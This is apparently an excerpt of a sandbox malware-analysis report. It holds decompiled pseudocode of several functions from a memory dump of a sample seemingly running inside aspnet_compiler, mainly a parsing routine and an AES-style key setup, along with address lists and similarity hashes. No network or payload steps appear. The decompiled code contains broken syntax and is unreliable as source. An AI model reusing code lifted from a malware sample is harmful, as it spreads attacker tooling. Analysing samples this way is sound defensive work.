						 *_t63 = _v32 - 1;
					} while ( *_t63 != 0);
					_t76 = _v28 + 1;
					_v44 = _t98;
					_v28 = _t76;
				} while (_t76 < 2);
				_t99 = _v24;
				_t88 = _v44;
				 *_t99 = _v56;
				_t99[1] = _v52;
				_t99[2] = _v48;
				_t99[3] = _t88;
				return _t88;
			}


































                0x00426355
                0x00426358
                0x0042635c
                0x0042635e
                0x00426361
                0x00426365
                0x0042636f
                0x00426375
                0x0042637d
                0x00426381
                0x00426384
                0x0042638c
                0x00426394
                0x00426398
                0x0042639c
                0x004263a0
                0x004263a8
                0x004263b0
                0x004263b3
                0x004263b7
                0x004263bb
                0x004263bf
                0x004263bf
                0x004263c1
                0x004263c9
                0x004263cd
                0x004263d1
                0x004263d5
                0x004263d5
                0x004263df
                0x004263e1
                0x00426429
                0x00426430
                0x00426435
                0x00426443
                0x00426446
                0x00426450
                0x00426454
                0x00426437
                0x00426437
                0x00426439
                0x00426439
                0x00426458
                0x0042645c
                0x0042645e
                0x00426462
                0x004263e3
                0x004263e3
                0x004263ea
                0x004263ef
                0x004263fd
                0x00426400
                0x0042640a
                0x0042640e
                0x004263f1
                0x004263f1
                0x004263f3
                0x004263f3
                0x00426412
                0x00426416
                0x0042641e
                0x00426421
                0x00426421
                0x00426468
                0x0042646c
                0x0042646e
                0x00426472
                0x00426472
                0x00426472
                0x00426481
                0x00426482
                0x00426486
                0x0042648a
                0x00426493
                0x0042649b
                0x0042649f
                0x004264a5
                0x004264ac
                0x004264b2
                0x004264b9

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                • Instruction ID: a1de7545f0e247fbbbd07e52f51d14befdf92f863a81e99c98e82dd5492d899e
                • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                • Instruction Fuzzy Hash: AF4108759183558BC340CF29C58061BFBE1FFD8314FA55A1EF889A3350D779E9828B86
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044C249 Relevance: .6, Instructions: 637COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4953faac537a6341995ce638b0f1ad96f44344fc72367eb287e0c4b71f6c8437
                • Instruction ID: 5247a1e75e2c909b3cb5b445d5caba4426badc4340d9fe5689049cae512f9ef4
                • Opcode Fuzzy Hash: 4953faac537a6341995ce638b0f1ad96f44344fc72367eb287e0c4b71f6c8437
                • Instruction Fuzzy Hash: 32325922D26F414DE7639634D8613366248AFB73C5F19C737E81AB5AA6EF2CC4C34105
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041DA05 Relevance: .6, Instructions: 598COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 93%
                			E0041DA05(intOrPtr* __ecx, intOrPtr __edx) {
				void* __edi;
				signed int _t260;
				intOrPtr _t262;
				intOrPtr _t275;
				signed int _t277;
				signed char _t282;
				void* _t284;
				void* _t290;
				void* _t293;
				intOrPtr _t297;
				void* _t322;
				signed char _t324;
				void* _t339;
				void* _t350;
				void* _t362;
				signed char _t370;
				signed int _t371;
				intOrPtr _t374;
				void* _t375;
				void* _t376;
				void* _t377;
				void* _t378;
				intOrPtr _t380;
				signed int _t381;
				intOrPtr _t382;
				signed short _t385;
				intOrPtr* _t386;
				intOrPtr _t387;
				intOrPtr _t388;
				intOrPtr _t390;
				intOrPtr _t393;
				signed int _t398;
				signed int _t404;
				intOrPtr* _t407;
				signed short _t430;
				signed int _t445;
				signed int _t448;
				intOrPtr _t454;
				signed int _t458;
				signed char _t459;
				intOrPtr _t462;
				void* _t469;
				void* _t478;
				intOrPtr* _t490;
				signed int _t491;
				signed int _t493;
				signed int _t494;
				intOrPtr _t495;
				signed int _t496;
				signed int _t497;
				signed int _t498;
				void* _t500;
				void* _t501;
				void* _t508;

				 *((intOrPtr*)(_t500 + 0x1c)) = __edx;
				_t490 = __ecx;
				 *((intOrPtr*)(_t500 + 0x2c)) = 0;
				 *((intOrPtr*)(_t500 + 0x28)) = 0;
				_t491 = 0;
				 *((char*)(__ecx + 0x320)) = 0;
				E00435760(__ecx, _t500 + 0x38, 0, 0x28);
				_t494 =  *(_t500 + 0x6c);
				_t501 = _t500 + 0xc;
				 *(_t501 + 0x28) = 0xfffb;
				_t393 =  *_t494;
				_t380 = _t393;
				 *((intOrPtr*)(_t501 + 0x3c)) = _t393;
				 *((intOrPtr*)(_t501 + 0x40)) = _t380;
				_t458 = 1;
				_t260 =  *(_t490 + 0x320) & 0x000000ff;
				if(_t260 == 0) {
					_t459 =  *(_t490 + 0x310) & 0x0000ffff;
					_t495 =  *((intOrPtr*)(_t501 + 0x64));
					if(_t459 < 0x8000) {
						L17:
						_push(0x48);
						_t262 = E004317CF();
						 *((intOrPtr*)(_t501 + 0x30)) = _t262;
						if(_t262 == 0) {
							L16:
							_t491 = 0xffffff83;
							L133:
							E0041D8A6(_t501 + 0x30);
							E0041CCD1(_t490);
							return _t491;
						}
						E00435760(_t490, _t262, 0, 0x48);
						_t381 =  *(_t501 + 0x48);
						_t501 = _t501 + 0xc;
						if(_t381 -  *((intOrPtr*)(_t501 + 0x40)) + 3 > _t495) {
							L10:
							_t491 = 0xfffffeb8;
							goto L133;
						}
						E0041BFB2(_t381 +  *((intOrPtr*)(_t501 + 0x1c)), _t501 + 0x24);
						_t398 =  *(_t501 + 0x24);
						_t382 = _t381 + 3;
						 *((intOrPtr*)(_t501 + 0x3c)) = _t382;
						 *(_t501 + 0x18) = _t398;
						if(_t398 > 0x481e) {
							goto L10;
						}
						_t462 =  *((intOrPtr*)(_t501 + 0x40));
						if(_t398 - _t462 + _t382 != _t495) {
							goto L10;
						}
						_t496 =  *(_t501 + 0x44);
						if(_t398 == 0) {
							L34:
							 *(_t501 + 0x4c) =  *(_t501 + 0x4c) & 0x00000000;
							 *(_t501 + 0x48) = _t496;
							if(_t496 != 0) {
								L40:
								 *(_t501 + 0x56) =  *(_t501 + 0x56) &  *(_t501 + 0x28);
								_t393 = 0x370;
								_t275 = E004317CF();
								 *((intOrPtr*)(_t501 + 0x38)) = _t275;
								if(_t275 == 0) {
									goto L16;
								} else {
									E00435760(_t490, _t275, 0, 0x370);
									_t501 = _t501 + 0xc;
									_t458 = 1;
									 *(_t490 + 0x320) = 1;
									L42:
									_t277 =  *(_t501 + 0x48);
									if(_t277 <= 0) {
										L63:
										if(_t491 != 0) {
											goto L133;
										}
										_t494 =  *(_t501 + 0x60);
										 *(_t490 + 0x320) = 2;
										L65:
										_t385 = 1;
										if( *(_t501 + 0x48) <= 0) {
											L70:
											if(( *(_t501 + 0x56) & _t385) == 0 || _t491 == 0) {
												 *(_t490 + 0x320) = 3;
												L73:
												if( *(_t501 + 0x48) <= 0) {
													L114:
													if(( *(_t501 + 0x56) & 1) == 0 || _t491 == 0) {
														 *(_t490 + 0x320) = 4;
														L117:
														if( *(_t501 + 0x50) != 0) {
															_t491 =  ==  ?  *(_t501 + 0x50) : _t491;
														}
														_push(_t501 + 0x30);
														_push(_t491);
														_t491 = E0041D744( *((intOrPtr*)( *_t490 + 0x50)), _t490);
														_t282 =  *(_t490 + 0x310) & 0x0000ffff;
														_t404 = _t282 & 0x00000080;
														if(_t404 != 0 && (_t491 == 0xfffffe96 || _t491 == 0xfffffe97)) {
															 *(_t490 + 0x1f8) =  *(_t490 + 0x1f8) & 0x00000000;
															_t491 = 0;
														}
														if(_t491 == 0) {
															if((_t282 & 0x00000030) == 0x10) {
																 *((char*)(_t490 + 0x319)) = 5;
															}
														} else {
															if(_t404 == 0) {
																E0041D6E5(_t490, _t491);
															}
															 *(_t490 + 0x1f8) = _t491;
														}
														_t284 = E0041C02B(_t490);
														_t393 =  *((intOrPtr*)(_t501 + 0x3c));
														if(_t284 != 0) {
															_t393 = _t393 +  *((intOrPtr*)(_t490 + 0x308));
															 *((intOrPtr*)(_t501 + 0x3c)) = _t393;
														}
														 *(_t490 + 0x320) = 5;
														L132:
														 *_t494 = _t393;
													}
													goto L133;
												}
												_t407 =  *((intOrPtr*)(_t501 + 0x38));
												if( *((intOrPtr*)(_t407 + 0x36c)) >= 0x80) {
													if( *((intOrPtr*)(_t490 + 0x22f)) == _t385 && ( *(_t490 + 0x310) & 0x00000030) == 0x10) {
														_t491 =  ==  ? 0xfffffe7f : _t491;
													}
													_t297 =  *((intOrPtr*)(_t490 + 0x230));
													if(_t297 == _t385 || _t297 == 3 &&  *((char*)(_t490 + 0x233)) == 0) {
														_t491 =  ==  ? 0xfffffe81 : _t491;
													}
												}
												if(( *(_t407 + 0x36d) & _t385) != 0) {
													if(( *(_t490 + 0x310) & 0x00000030) != 0x10) {
														_t491 =  ==  ? 0xfffffe7e : _t491;
													} else {
														if(( *(_t407 + 0x31c) & 0x00000003) == 0) {
															_t491 = 0xfffffe7e;
														}
													}
												}
												if(( *(_t501 + 0x56) & _t385) == 0) {
													 *(_t490 + 0x312) =  *(_t490 + 0x312) | 0x00002000;
													if(( *(_t490 + 0x310) & 0x00000080) == 0) {
														_t291 =  *((intOrPtr*)(_t490 + 0x100));
														if( *((intOrPtr*)(_t490 + 0x100)) != 0) {
															if( *((intOrPtr*)(_t407 + 0x24)) == 0) {
																E0041D5DD( *((intOrPtr*)(_t407 + 0x7c)), _t291);
																_t491 =  ==  ? 0xfffffebe : _t491;
																_t407 =  *((intOrPtr*)(_t501 + 0x38));
															} else {
																_push(_t407);
																_t293 = E0041D68F(_t291);
																_t407 =  *((intOrPtr*)(_t501 + 0x38));
																if(_t293 != _t385) {
																	_t491 = 0xfffffebe;
																}
															}
														}
													}
													if( *((intOrPtr*)(_t407 + 0x1c)) != 0x206) {
														goto L114;
													} else {
														 *(_t501 + 0x60) =  *(_t501 + 0x60) & 0x00000000;
														_t386 = _t490 + 0x384;
														if( *_t386 != 0) {
															if( *((char*)(_t490 + 0x38a)) == 0) {
																L107:
																if(E00429F0D( *_t407, _t501 + 0x64,  *_t386,  *((intOrPtr*)(_t407 + 4))) != 0) {
																	L109:
																	_t491 = 0xfffffeaa;
																	L110:
																	if(_t491 == 0 &&  *((char*)(_t490 + 0x38a)) != 0 && ( *(_t490 + 0x310) & 0x00000080) == 0) {
																		E0042D8ED( *_t386);
																		_t491 =  <  ? 0xfffffe66 : _t491;
																	}
																	goto L114;
																}
																 *((char*)(_t490 + 0x38a)) = 1;
																goto L110;
															}
															_t290 = E0041CCB2(_t490,  *_t386);
															 *((char*)(_t490 + 0x38a)) = 0;
															L105:
															if(_t290 != 0) {
																goto L109;
															}
															_t407 =  *((intOrPtr*)(_t501 + 0x38));
															goto L107;
														}
														_push(_t386);
														_t469 = 0x25;
														_t290 = E0041CC29(_t490, _t469);
														goto L105;
													}
												} else {
													 *(_t490 + 0x1f8) = _t491;
													goto L133;
												}
											} else {
												goto L133;
											}
										}
										 *(_t501 + 0x4c) =  *(_t501 + 0x4c) & 0x00000000;
										_push(_t501 + 0x20);
										_push(_t501 + 0x30);
										_push( !(( *(_t490 + 0x310) & 0x0000ffff) >> 7) & 1);
										_push(_t393);
										_t491 = E0041D8F4(_t501 + 0x38);
										_t501 = _t501 + 0x10;
										if(_t491 != 0) {
											if(_t491 == 0xffffff74 || _t491 == 0xffffff7c ||  *((intOrPtr*)(_t490 + 0x80)) == 0) {
												L69:
												 *(_t501 + 0x56) =  *(_t501 + 0x56) | _t385;
											} else {
												 *(_t501 + 0x56) =  *(_t501 + 0x56) ^ ( *(_t501 + 0x56) >> 0x00000001 ^  *(_t501 + 0x56)) & 1;
											}
											goto L70;
										}
										if(( *(_t501 + 0x56) & 0x00000002) == 0) {
											 *(_t501 + 0x56) =  *(_t501 + 0x56) & 0x0000fffe;
											goto L70;
										}
										_t491 =  *(_t501 + 0x50);
										goto L69;
									}
									while(_t277 > _t458) {
										 *(_t501 + 0x4c) =  *(_t501 + 0x48) - 1;
										_push(_t501 + 0x20);
										_push(_t501 + 0x30);
										_push( !(( *(_t490 + 0x310) & 0x0000ffff) >> 7) & _t458);
										_push(_t393);
										_t322 = E0041D8F4(_t501 + 0x38);
										_t501 = _t501 + 0x10;
										if(_t322 == 0) {
											_t322 = E0041D9CD(_t490, _t501 + 0x30);
										}
										_push(_t501 + 0x30);
										_push(_t322);
										_t491 = E0041D744( *((intOrPtr*)( *_t490 + 0x50)), _t490);
										_t324 = 0x80;
										_t430 =  *(_t490 + 0x310) & 0x00000080;
										if(_t430 != 0 && (_t491 == 0xfffffe96 || _t491 == 0xfffffe97)) {
											 *(_t490 + 0x1f8) =  *(_t490 + 0x1f8) & 0x00000000;
											_t491 = 0;
										}
										if(_t491 != 0) {
											L57:
											if(( *(_t490 + 0x310) & _t324) == 0) {
												E0041D6E5(_t490, _t491);
											}
											 *(_t490 + 0x1f8) = _t491;
											if( *(_t501 + 0x50) == 0) {
												 *(_t501 + 0x50) = _t491;
												_t491 = 0;
											}
											goto L61;
										} else {
											if(( *( *((intOrPtr*)(_t501 + 0x38)) + 0x36c) & 0x00000010) == 0 || _t430 != 0) {
												L61:
												_t393 =  *((intOrPtr*)(_t501 + 0x38));
												E0042774D(_t393);
												 *(_t501 + 0x56) =  *(_t501 + 0x56) &  *(_t501 + 0x28);
												_t277 =  *(_t501 + 0x48) - 1;
												_t458 = 1;
												 *(_t501 + 0x48) = _t277;
												continue;
											} else {
												_t387 =  *((intOrPtr*)(_t501 + 0x30));
												_t497 =  *(_t501 + 0x4c);
												if( *(_t501 + 0x20) != _t491) {
													goto L61;
												}
												 *(_t501 + 0x20) =  *(_t501 + 0x20) & _t491;
												_t491 = E00429B79( *((intOrPtr*)(_t387 + 4 + _t497 * 8)), 5,  *((intOrPtr*)(_t490 + 0x84)));
												if(_t491 < 0) {
													goto L133;
												}
												E004351E0( *( *(_t501 + 0x20)),  *((intOrPtr*)(_t387 + _t497 * 8)),  *((intOrPtr*)(_t387 + 4 + _t497 * 8)));
												_t478 = _t501 + 0x28;
												_t501 = _t501 + 0xc;
												_push(0);
												_push(2);
												_t491 =  ==  ? 0 : E0041FC23( *((intOrPtr*)( *_t490 + 0x50)), _t478);
												if(_t491 == 0) {
													goto L61;
												}
												_t324 = 0x80;
												goto L57;
											}
										}
									}
									goto L63;
								}
							}
							if(( *(_t490 + 0x314) & 0x00002000) != 0) {
								L38:
								if(( *(_t490 + 0x310) & 0x00000030) == 0) {
									_t491 = 0xfffffea7;
									E0041D6E5(_t490, 0xfffffea7);
								}
								goto L40;
							}
							if(( *(_t490 + 0x310) & 0x00000100) == 0) {
								goto L40;
							}
							_t339 = E0041C012( *(_t490 + 0x220) & 0x0000ffff);
							_t501 = _t501 + 4;
							if(_t339 == 0) {
								goto L40;
							}
							goto L38;
						}
						L22:
						L22:
						if(_t496 >= ( *(_t490 + 0x216) & 0x000000ff) || _t496 >= 9) {
							_t491 = 0xfffffe90;
						} else {
							goto L24;
						}
						goto L133;
						L24:
						if(_t382 - _t462 + 3 >  *((intOrPtr*)(_t501 + 0x64))) {
							goto L10;
						}
						E0041BFB2(_t382 +  *((intOrPtr*)(_t501 + 0x1c)), _t501 + 0x24);
						_t445 =  *(_t501 + 0x24);
						_t388 = _t382 + 3;
						 *((intOrPtr*)(_t501 + 0x3c)) = _t388;
						if(_t445 -  *((intOrPtr*)(_t501 + 0x40)) + _t388 >  *((intOrPtr*)(_t501 + 0x64))) {
							goto L10;
						}
						 *( *((intOrPtr*)(_t501 + 0x30)) + 4 + _t496 * 8) = _t445;
						_t498 =  *(_t501 + 0x20);
						 *((intOrPtr*)( *((intOrPtr*)(_t501 + 0x34)) +  *(_t501 + 0x48) * 8)) =  *((intOrPtr*)(_t501 + 0x40)) + _t498;
						_t382 =  *((intOrPtr*)(_t501 + 0x40)) +  *(_t501 + 0x28);
						_t350 = 0xfffffffd;
						_t448 =  *((intOrPtr*)(_t501 + 0x1c)) + _t350 -  *(_t501 + 0x24);
						 *((intOrPtr*)(_t501 + 0x3c)) = _t382;
						 *(_t501 + 0x18) = _t448;
						if( *(_t490 + 0x310) < 0x8000) {
							L31:
							_t496 =  *(_t501 + 0x44) + 1;
							 *(_t501 + 0x44) = _t496;
							if(_t448 == 0) {
								goto L34;
							} else {
								_t462 =  *((intOrPtr*)(_t501 + 0x40));
								goto L22;
							}
						}
						if(_t382 -  *((intOrPtr*)(_t501 + 0x40)) + 2 >  *((intOrPtr*)(_t501 + 0x64))) {
							goto L10;
						}
						E0041BFCC(_t382 + _t498, _t501 + 0x14);
						_t493 =  *(_t501 + 0x14) & 0x0000ffff;
						_t390 = _t382 + 2;
						 *((intOrPtr*)(_t501 + 0x3c)) = _t390;
						if(_t493 -  *((intOrPtr*)(_t501 + 0x40)) + _t390 >  *((intOrPtr*)(_t501 + 0x64))) {
							goto L10;
						}
						 *( *((intOrPtr*)(_t501 + 0x34)) + 4 +  *(_t501 + 0x44) * 8) = _t493;
						 *((intOrPtr*)( *((intOrPtr*)(_t501 + 0x38)) +  *(_t501 + 0x48) * 8)) =  *((intOrPtr*)(_t501 + 0x40)) + _t498;
						 *((intOrPtr*)(_t501 + 0x40)) =  *((intOrPtr*)(_t501 + 0x40)) + _t493;
						_t362 = 0xfffffffe;
						 *(_t501 + 0x18) =  *(_t501 + 0x18) + _t362 - _t493;
						_t491 = E004227B4(_t490,  *((intOrPtr*)( *((intOrPtr*)(_t501 + 0x38)) +  *(_t501 + 0x48) * 8)), _t508,  *( *((intOrPtr*)(_t501 + 0x38)) + 4 +  *(_t501 + 0x48) * 8) & 0x0000ffff, 0xb, 0);
						_t501 = _t501 + 0xc;
						if(_t491 < 0) {
							goto L133;
						} else {
							_t382 =  *((intOrPtr*)(_t501 + 0x3c));
							_t448 =  *(_t501 + 0x18);
							goto L31;
						}
					}
					if(_t393 - _t380 + 1 <= _t495) {
						_t370 =  *((intOrPtr*)(_t393 +  *((intOrPtr*)(_t501 + 0x1c))));
						_t454 = _t393 + 1;
						 *(_t501 + 0x14) = _t370;
						_t371 = _t370 & 0x000000ff;
						 *(_t501 + 0x24) = _t371;
						 *((intOrPtr*)(_t501 + 0x3c)) = _t454;
						if(_t371 - _t380 + _t454 > _t495) {
							goto L10;
						}
						if((_t459 & 0x00000030) != 0x10 ||  *(_t501 + 0x14) == 0) {
							 *((intOrPtr*)(_t501 + 0x3c)) = _t454 +  *(_t501 + 0x24);
							_push(0x48);
							_t374 = E004317CF();
							 *((intOrPtr*)(_t501 + 0x34)) = _t374;
							if(_t374 != 0) {
								goto L17;
							}
							goto L16;
						} else {
							_t491 = 0xfffffe5c;
							goto L133;
						}
					}
					goto L10;
				}
				_t375 = _t260 - _t458;
				if(_t375 == 0) {
					goto L42;
				}
				_t376 = _t375 - _t458;
				if(_t376 == 0) {
					goto L65;
				}
				_t377 = _t376 - _t458;
				if(_t377 == 0) {
					_t385 = 1;
					goto L73;
				}
				_t378 = _t377 - _t458;
				if(_t378 == 0) {
					goto L117;
				}
				if(_t378 == _t458) {
					goto L132;
				} else {
					_t491 = 0xfffffed3;
					goto L133;
				}
			}

























































                0x0041da0e
                0x0041da12
                0x0041da14
                0x0041da1b
                0x0041da1f
                0x0041da21
                0x0041da2c
                0x0041da31
                0x0041da35
                0x0041da3f
                0x0041da47
                0x0041da4a
                0x0041da4c
                0x0041da50
                0x0041da56
                0x0041da57
                0x0041da59
                0x0041da91
                0x0041da9d
                0x0041daa4
                0x0041db11
                0x0041db11
                0x0041db14
                0x0041db19
                0x0041db1f
                0x0041db09
                0x0041db0b
                0x0041e1fa
                0x0041e1fe
                0x0041e205
                0x0041e213
                0x0041e213
                0x0041db26
                0x0041db2b
                0x0041db2f
                0x0041db3d
                0x0041daaf
                0x0041daaf
                0x00000000
                0x0041daaf
                0x0041db4e
                0x0041db53
                0x0041db57
                0x0041db5a
                0x0041db5e
                0x0041db68
                0x00000000
                0x00000000
                0x0041db6e
                0x0041db7a
                0x00000000
                0x00000000
                0x0041db80
                0x0041db86
                0x0041dce6
                0x0041dce6
                0x0041dceb
                0x0041dcf1
                0x0041dd3a
                0x0041dd43
                0x0041dd48
                0x0041dd4a
                0x0041dd4f
                0x0041dd55
                0x00000000
                0x0041dd5b
                0x0041dd5f
                0x0041dd66
                0x0041dd69
                0x0041dd6a
                0x0041dd70
                0x0041dd70
                0x0041dd76
                0x0041dee0
                0x0041dee2
                0x00000000
                0x00000000
                0x0041dee8
                0x0041deec
                0x0041def3
                0x0041def5
                0x0041defb
                0x0041df48
                0x0041df4c
                0x0041df56
                0x0041df5d
                0x0041df62
                0x0041e14a
                0x0041e151
                0x0041e15b
                0x0041e162
                0x0041e167
                0x0041e16b
                0x0041e16b
                0x0041e176
                0x0041e177
                0x0041e183
                0x0041e185
                0x0041e18f
                0x0041e195
                0x0041e1a7
                0x0041e1ae
                0x0041e1ae
                0x0041e1b2
                0x0041e1ce
                0x0041e1d0
                0x0041e1d0
                0x0041e1b4
                0x0041e1b7
                0x0041e1bd
                0x0041e1bd
                0x0041e1c2
                0x0041e1c2
                0x0041e1d9
                0x0041e1de
                0x0041e1e4
                0x0041e1e6
                0x0041e1ec
                0x0041e1ec
                0x0041e1f0
                0x0041e1f7
                0x0041e1f7
                0x0041e1f7
                0x00000000
                0x0041e151
                0x0041df68
                0x0041df77
                0x0041df7f
                0x0041df99
                0x0041df99
                0x0041df9c
                0x0041dfa4
                0x0041dfbe
                0x0041dfbe
                0x0041dfa4
                0x0041dfc7
                0x0041dfd3
                0x0041e03b
                0x0041dfd5
                0x0041dfdc
                0x0041dfde
                0x0041dfde
                0x0041dfdc
                0x0041dfd3
                0x0041e042
                0x0041e054
                0x0041e061
                0x0041e063
                0x0041e06b
                0x0041e071
                0x0041e092
                0x0041e09f
                0x0041e0a2
                0x0041e073
                0x0041e073
                0x0041e076
                0x0041e07c
                0x0041e082
                0x0041e084
                0x0041e084
                0x0041e082
                0x0041e071
                0x0041e06b
                0x0041e0ad
                0x00000000
                0x0041e0b3
                0x0041e0b3
                0x0041e0b8
                0x0041e0c1
                0x0041e0d7
                0x0041e0f2
                0x0041e106
                0x0041e113
                0x0041e113
                0x0041e118
                0x0041e11a
                0x0041e134
                0x0041e147
                0x0041e147
                0x00000000
                0x0041e11a
                0x0041e10b
                0x00000000
                0x0041e10b
                0x0041e0dd
                0x0041e0e2
                0x0041e0e9
                0x0041e0ec
                0x00000000
                0x00000000
                0x0041e0ee
                0x00000000
                0x0041e0ee
                0x0041e0c3
                0x0041e0c6
                0x0041e0c9
                0x00000000
                0x0041e0c9
                0x0041e044
                0x0041e044
                0x00000000
                0x0041e044
                0x00000000
                0x00000000
                0x00000000
                0x0041df4c
                0x0041defd
                0x0041df06
                0x0041df0b
                0x0041df1e
                0x0041df1f
                0x0041df27
                0x0041df29
                0x0041df2e
                0x0041dffa
                0x0041df43
                0x0041df43
                0x0041e019
                0x0041e025
                0x0041e025
                0x00000000
                0x0041dffa
                0x0041df39
                0x0041dfea
                0x00000000
                0x0041dfea
                0x0041df3f
                0x00000000
                0x0041df3f
                0x0041ded8
                0x0041dd86
                0x0041dd8e
                0x0041dd93
                0x0041dda6
                0x0041dda7
                0x0041ddaa
                0x0041ddaf
                0x0041ddb4
                0x0041ddbc
                0x0041ddbc
                0x0041ddc7
                0x0041ddca
                0x0041dddc
                0x0041ddde
                0x0041dde3
                0x0041dde6
                0x0041ddf8
                0x0041ddff
                0x0041ddff
                0x0041de03
                0x0041de96
                0x0041de9c
                0x0041dea2
                0x0041dea2
                0x0041deac
                0x0041deb2
                0x0041deb4
                0x0041deb8
                0x0041deb8
                0x00000000
                0x0041de09
                0x0041de14
                0x0041deba
                0x0041deba
                0x0041debe
                0x0041dec9
                0x0041ded2
                0x0041ded3
                0x0041ded4
                0x00000000
                0x0041de23
                0x0041de23
                0x0041de27
                0x0041de2f
                0x00000000
                0x00000000
                0x0041de43
                0x0041de4e
                0x0041de54
                0x00000000
                0x00000000
                0x0041de67
                0x0041de6e
                0x0041de72
                0x0041de78
                0x0041de7a
                0x0041de8c
                0x0041de91
                0x00000000
                0x00000000
                0x0041de93
                0x00000000
                0x0041de93
                0x0041de14
                0x0041de03
                0x00000000
                0x0041ded8
                0x0041dd55
                0x0041dcff
                0x0041dd23
                0x0041dd2a
                0x0041dd2c
                0x0041dd35
                0x0041dd35
                0x00000000
                0x0041dd2a
                0x0041dd0d
                0x00000000
                0x00000000
                0x0041dd17
                0x0041dd1c
                0x0041dd21
                0x00000000
                0x00000000
                0x00000000
                0x0041dd21
                0x00000000
                0x0041db8c
                0x0041db95
                0x0041dcdc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0041dba4
                0x0041dbaf
                0x00000000
                0x00000000
                0x0041dbc0
                0x0041dbc5
                0x0041dbc9
                0x0041dbce
                0x0041dbdc
                0x00000000
                0x00000000
                0x0041dbe8
                0x0041dbf8
                0x0041dbfe
                0x0041dc09
                0x0041dc0d
                0x0041dc12
                0x0041dc14
                0x0041dc1d
                0x0041dc28
                0x0041dcc6
                0x0041dcca
                0x0041dccb
                0x0041dcd1
                0x00000000
                0x0041dcd3
                0x0041dcd3
                0x00000000
                0x0041dcd3
                0x0041dcd1
                0x0041dc3b
                0x00000000
                0x00000000
                0x0041dc48
                0x0041dc4d
                0x0041dc52
                0x0041dc57
                0x0041dc65
                0x00000000
                0x00000000
                0x0041dc75
                0x0041dc87
                0x0041dc92
                0x0041dc96
                0x0041dc99
                0x0041dcb1
                0x0041dcb3
                0x0041dcb8
                0x00000000
                0x0041dcbe
                0x0041dcbe
                0x0041dcc2
                0x00000000
                0x0041dcc2
                0x0041dcb8
                0x0041daad
                0x0041dabd
                0x0041dac0
                0x0041dac1
                0x0041dac5
                0x0041dac8
                0x0041dad0
                0x0041dad6
                0x00000000
                0x00000000
                0x0041dade
                0x0041daf5
                0x0041daf9
                0x0041dafc
                0x0041db01
                0x0041db07
                0x00000000
                0x00000000
                0x00000000
                0x0041dae7
                0x0041dae7
                0x00000000
                0x0041dae7
                0x0041dade
                0x00000000
                0x0041daad
                0x0041da5b
                0x0041da5d
                0x00000000
                0x00000000
                0x0041da63
                0x0041da65
                0x00000000
                0x00000000
                0x0041da6b
                0x0041da6d
                0x0041da8b
                0x00000000
                0x0041da8b
                0x0041da6f
                0x0041da71
                0x00000000
                0x00000000
                0x0041da79
                0x00000000
                0x0041da7f
                0x0041da7f
                0x00000000
                0x0041da7f

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bcb56965ed424a728ba321d2f94f1de26474605289b852d1a031e8102b7c40b2
                • Instruction ID: d9b4628a552884fe08657dda03454fe4f08494c5736acd48bf418c9c256f3f61
                • Opcode Fuzzy Hash: bcb56965ed424a728ba321d2f94f1de26474605289b852d1a031e8102b7c40b2
                • Instruction Fuzzy Hash: B032F471A087559BC719DF29C4807ABB7E5BF84308F044A2EF8958B381D778DD85CB8A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00425CA8 Relevance: .4, Instructions: 435COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 36%
                			E00425CA8(void* __ebx, signed int* __ecx, void* __edx, void* __esi) {
				void* __edi;
				signed int _t250;
				signed int _t267;
				void* _t270;
				signed char _t318;
				signed int _t334;
				signed int _t355;
				signed int _t373;
				signed int _t391;
				signed int _t410;
				signed int _t418;
				signed int _t430;
				signed int _t432;
				signed int _t436;
				intOrPtr _t437;
				signed char _t460;
				signed int _t464;
				signed int _t466;
				signed int _t469;
				signed int _t472;
				signed int _t474;
				signed int _t475;
				signed int _t478;
				signed int _t482;
				signed int _t488;
				intOrPtr _t489;
				signed char* _t499;
				signed int _t506;
				signed int _t512;
				signed int _t519;
				signed int _t525;
				signed int _t531;
				unsigned int _t533;
				signed int* _t534;
				void* _t536;
				void* _t537;
				signed char* _t538;
				signed int* _t540;
				signed int* _t541;
				signed int* _t544;
				void* _t545;
				intOrPtr _t546;
				void* _t548;
				void* _t549;
				void* _t550;
				signed char* _t555;
				void* _t559;
				void* _t560;

				_push(__ecx);
				_t533 =  *(_t559 + 0x18);
				_t544 = __ecx;
				 *((intOrPtr*)(_t559 + 0x10)) = __ecx;
				 *(__ecx + 0xf4) = _t533;
				 *((intOrPtr*)(__ecx + 0xf0)) = (_t533 >> 2) + 6;
				E004351E0(__ecx, __edx, _t533);
				E00425616(_t544, _t544, _t533);
				_t560 = _t559 + 0x10;
				if(_t533 == 0x10) {
					_t482 = _t544[3];
					_t534 =  &(_t544[1]);
					_t430 = ( *(0x466ee0 + (_t482 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x466ae0 + (_t482 >> 0x18) * 4) & 0x000000ff ^  *(0x4672e0 + (_t482 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4666e0 + (_t482 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t544;
					_t544[4] = _t430;
					_t250 =  *_t534 ^ _t430;
